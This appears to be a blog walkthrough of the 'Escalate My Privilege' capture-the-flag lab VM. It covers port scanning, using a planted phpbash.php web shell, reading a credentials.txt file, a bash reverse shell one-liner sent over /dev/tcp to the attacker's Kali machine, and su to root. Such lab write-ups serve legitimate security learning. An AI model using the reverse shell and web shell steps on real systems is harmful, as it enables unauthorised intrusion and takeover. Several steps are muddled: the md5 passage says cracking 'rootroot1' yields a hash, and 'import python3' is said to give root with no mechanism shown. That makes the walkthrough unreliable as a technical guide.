Escalate My Privilege

Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

Ans: First, Open Escalate_my_privilage in VM. We can see the IP address of 192.168.1.13.

Ans: By nmap -sV 192.168.1.13 connect to Escalate_my_privilage VM to watch how many ports are open.

Ans: Connect to your Escalate_my_privilage IP address 192.168.1.13.

Ans: Go to Inspect element we can find phpbash.php to open.

Ans: (ls) to watch version files list.

Ans: Make server connection from kali ( sudo python3 -m http.server 80 ) your Escalate_my_privilage. Make shell.php file to connect from 192.168.1.13.

Ans: I found at whoami (apache), id uid=48, ls -la found total 44 files.

Ans: I am in /var/www/html, cat robots.txt user-agent: *

Ans: Inside the home directory, I found armour folder and when I go through it and check the file then I found some files but there I found the file name as credentials.txt. I had found the root password md5 (rootroot1).

Ans: After cracking string rootroot1 using md5 we got a hash password.

Reverse Shell

Shell shoveling, in network security, refers to the act of redirecting the input and output of a shell to a service so that it can be remotely accessed. In computing, the most basic method of interfacing with the operating system is the shell.

Ans: connect from web shell to kali device (bash -c ‘exec bash -i &>/dev/tcp/192.168.1.14/4949 <&1’).

Ans: I have found id, apache.

Ans: Command su armour password hash password which we had cracked before.

Ans: import python3 After getting python 3 we got a root privilege.

Ans: Get root user.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store